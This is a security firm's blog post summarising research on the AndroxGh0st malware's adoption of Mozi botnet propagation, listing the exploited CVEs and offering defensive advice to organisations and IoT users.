Blog Details

  • Home
  • Blog
  • AndroxGh0st and Mozi Botnet Collaboration Expands Attack Reach
AndroxGh0st and Mozi Botnet Collaboration Expands Attack Reach

AndroxGh0st and Mozi Botnet Collaboration Expands Attack Reach

In a concerning evolution of botnet capabilities, cybersecurity researchers have uncovered that the AndroxGh0st malware is now leveraging the Mozi botnet to expand its reach and propagation power. This collaboration aims to exploit a broader range of vulnerabilities, focusing on internet-facing and IoT applications to build a robust network of compromised devices for malicious purposes.

The AndroxGh0st Malware Campaign

AndroxGh0st, a Python-based cloud attack tool, initially gained attention for its focus on targeting Laravel applications to extract sensitive cloud service data, including AWS, SendGrid, and Twilio credentials. Active since 2022, AndroxGh0st has used known vulnerabilities in applications like the Apache web server (CVE-2021-41773) and the Laravel Framework (CVE-2018-15133) to gain unauthorized access, escalate privileges, and maintain persistence.

In January 2024, U.S. intelligence agencies reported that AndroxGh0st had been used to create botnets for targeted exploitation of victim networks. Now, according to CloudSEK's latest findings, the malware has expanded to exploit an array of vulnerabilities to bolster its botnet:

Exploited Vulnerabilities:

  1. CVE-2014-2120: Cisco ASA WebVPN login page XSS (CVSS 4.3)
  2. CVE-2018-10561/10562: Dasan GPON authentication bypass and command injection (CVSS 9.8)
  3. CVE-2021-26086: Atlassian Jira path traversal (CVSS 5.3)
  4. CVE-2021-41277: Metabase GeoJSON map local file inclusion (CVSS 7.5)
  5. CVE-2022-1040: Sophos Firewall authentication bypass (CVSS 9.8)
  6. CVE-2022-21587: Oracle E-Business Suite file upload (CVSS 9.8)
  7. CVE-2023-1389: TP-Link Archer AX21 command injection (CVSS 8.8)
  8. CVE-2024-4577: PHP CGI argument injection (CVSS 9.8)
  9. CVE-2024-36401: GeoServer remote code execution (CVSS 9.8)

The AndroxGh0st botnet employs common administrative usernames combined with a consistent password pattern to brute-force access to WordPress /wp-admin panels, allowing it to compromise backend website controls.

Mozi Botnet: Expanding the Attack Vector

The Mozi botnet, primarily known for its attacks on IoT devices, has long been a persistent force in the DDoS landscape. Even after the arrest of its original authors by Chinese authorities in 2021, Mozi remained active until a kill-switch command in August 2023 brought a temporary halt. Despite this setback, Mozi's propagation mechanisms are now integrated within AndroxGh0st, enabling it to spread further through IoT device networks.

AndroxGh0st uses Mozi’s capabilities to propagate malware through devices such as Netgear DGN routers and Dasan GPON home routers, leveraging unauthenticated command execution vulnerabilities to distribute a malicious payload called “Mozi.m” from remote servers.

Implications of the AndroxGh0st-Mozi Integration

By embedding Mozi’s propagation functionalities, AndroxGh0st gains expanded reach across IoT environments, which often lack comprehensive security measures. CloudSEK’s report highlights the strategic advantage of this collaboration:

  1. Enhanced Propagation: Mozi’s IoT infection mechanisms allow AndroxGh0st to bypass traditional endpoint security solutions and access a broader range of devices.
  2. Unified Command Infrastructure: Both botnets reportedly share the same command and control (C2) infrastructure, indicating a high degree of operational integration.
  3. Streamlined Operations: Combining forces allows both botnets to conduct expansive attacks with improved efficiency and coordination, maximizing the impact on compromised systems.

Takeaways for Security Teams and IoT Users

The convergence of these two botnets underscores the importance of robust security practices across cloud applications, IoT devices, and other internet-facing infrastructures. To mitigate the risk of compromise by sophisticated botnets like AndroxGh0st and Mozi, organizations should consider the following best practices:

  1. Patch Known Vulnerabilities: Regularly update and patch systems, applications, and IoT devices to protect against exploits of known vulnerabilities.
  2. Limit Exposure of Critical Applications: Restrict internet-facing exposure of sensitive applications or configure access controls to limit exposure.
  3. Implement Strong Authentication Mechanisms: Utilize multi-factor authentication (MFA) and enforce complex, unique passwords for administrative accounts.
  4. Monitor for Suspicious Activity: Deploy monitoring solutions to detect and respond to signs of unauthorized access or network anomalies.

The AndroxGh0st and Mozi alliance demonstrates a concerning escalation in botnet capabilities, combining credential-stealing, DDoS, and IoT infection tactics. As cybercriminals increasingly collaborate across malware variants, organizations must remain vigilant in safeguarding their networks and internet-connected devices against these evolving threats.

 

© 2016 - 2025 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067